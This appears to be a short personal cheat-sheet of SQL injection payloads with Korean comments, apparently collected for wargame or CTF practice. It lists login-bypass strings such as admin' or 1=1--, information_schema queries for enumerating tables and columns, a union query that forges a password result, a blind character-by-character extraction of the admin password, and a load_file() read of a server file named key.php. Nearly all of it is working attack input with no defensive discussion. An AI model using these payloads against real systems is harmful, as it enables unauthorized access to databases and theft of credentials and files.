http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt



%09 Tab

%0a enter

%20 space bar


admin'# , admin' or 1=1-- , admin' or 1=1# , admin'-- , -1||0x616414212


select table_name from information_schema.tables where table_type='basetable' limit 0,1;


select user_pw from user_table where no='-1' union select 'admin';


select table_name from information_schema.tables where table_schema=database() limit 0, 1;

select column_name from information_schema.columns where table_name='board' limit 0, 1;

//현재 사용중인 table 찾고, 그뒤 알아낸 table명으로 column이름 찾기


select no from m_sur3x5F4 where no='$_GET[no]';

1 and ascii(substr((select password from m_sur3x5F4 where id='admin'),1,1)) > 0


select table_name from information_schema.tables where table_schema!='information_schema';

//root 이지 않은 평범한 일반계정일 경우, 관리하는 테이블_스키마 이외에 나머지 인포메이션_스키마를 찾는다 (즉, 사용자가 직접 구성한 테이블만 찾는다)


'(select 1)=1#

"|"



select 1,2,(load_file('/home/www/key.php')),4,5

//key.php를 열어보기 위한 injection query문

+ Recent posts